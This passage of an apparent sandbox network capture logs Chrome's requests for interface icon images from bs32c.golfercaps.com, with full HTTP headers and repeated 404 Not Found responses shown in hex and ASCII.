                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:41 UTC851INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:41 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFK%2FgB0h0LUMAdVNc3XSlAjWF%2BXUm0YX%2FIciv3hEKoB%2FOlsYtcCRUYsxBlc%2Be%2FK5Oz4XjGWxp8Wt1bM%2BlhYRKmlE89ekgeVTPJbGTdA7L6B5A1C4Zh5jFq8%2Ftf2Neyh3L58H73m4Pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533794e3b4259-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1735&rtt_var=658&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2055&delivery_rate=1654390&cwnd=233&unsent_bytes=0&cid=171a511449310c96&ts=1120&x=0"
                                                                  2024-12-30 21:42:41 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  61192.168.2.458522188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:41 UTC1440OUTGET /vfd23ced/assets/icon_check_emptyall.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:42 UTC849INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:42 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fpg6trqY0mnRoc10Hn5NT%2BK%2BQDk1SMIEtTBCCfQFwh9%2BuXZetbSsOKFIAaIYERUt%2FO7QznzmCYpgaOtoYU9ou97h3KFwYL0wyE5%2BBxa29JcnRisEduJbA9wh%2FlBhVAfJTx%2BgG12Edw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5337d0fff0f74-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=601&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2040&delivery_rate=1819314&cwnd=151&unsent_bytes=0&cid=84fa2aaf619d3102&ts=1450&x=0"
                                                                  2024-12-30 21:42:42 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  62192.168.2.458523188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:41 UTC1448OUTGET /vfd23ced/assets/icon_check_emptyall_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:43 UTC847INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:43 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4%2F8XNL8MPan3v5g0SVlyEZ3zd2ipNJBcW3HonMrfIxODDM0DYQISFLUFaqhjwer%2BX5WBnN87m5G%2Bc1%2FYXh90%2FKr4WiyC9gFY17ZRhHSt0716T2W0tkn1re2Wi1SEMBM%2Bbj6IqBeYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5337d9da04288-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1722&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2048&delivery_rate=1655328&cwnd=245&unsent_bytes=0&cid=d730fcde0e8e5811&ts=2120&x=0"
                                                                  2024-12-30 21:42:43 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  63192.168.2.458524188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:41 UTC1439OUTGET /vfd23ced/assets/icon_radio_checked.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:42 UTC841INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:42 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MI4%2FjELcY5dYeJwDoxmxvqWGiPWgeXoaacurmA9L%2FRsRWRXMmqAZ0IIpBnpOCtOsh8donJNSJVhcSx8giJg8CTGBcmvMCNRSN96%2Fc3X5p346aaxjhGvZkAAYKRdqyBhhoMiJunorzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5337d9fd87d02-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2005&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2039&delivery_rate=1425085&cwnd=230&unsent_bytes=0&cid=bc73a420b61b1c11&ts=1408&x=0"
                                                                  2024-12-30 21:42:42 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  64192.168.2.458525188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:42 UTC1447OUTGET /vfd23ced/assets/icon_radio_checked_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:43 UTC843INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:43 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHn3n4beRB%2BSS94gssuptuL7nOn0MEuYlYPVFT5ZXBD%2BNqrCkYhE2A35wih7ipzu%2FFq79ExV5iTWC1RE3IAnBB4aZCzlqwdwTT6ots1QDD2nzXWr34Gfgf%2BrBze6PSJvapS2wao7Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533831ad68c39-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2005&rtt_var=773&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2047&delivery_rate=1396461&cwnd=190&unsent_bytes=0&cid=7dc13e987707ea6b&ts=1485&x=0"
                                                                  2024-12-30 21:42:43 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  65192.168.2.458526188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:42 UTC1437OUTGET /vfd23ced/assets/icon_radio_empty.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:43 UTC849INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:43 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTAF%2FTHgKJNl5i75AJWWUtfdQadA3SIFZQsPvwj6klKwS8kwDj7h%2Fyj3JQbP0LtubMKgpTKu6uou3CZS%2FGk%2BBD1xwZBAddp6xnj8IpfNTJLCfCEBQFVxm2tnW8q%2Bf%2FIO%2Fdogfzzy9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533831edd4309-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1584&rtt_var=612&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2037&delivery_rate=1760096&cwnd=234&unsent_bytes=0&cid=4729e1685d4ee1dd&ts=1545&x=0"
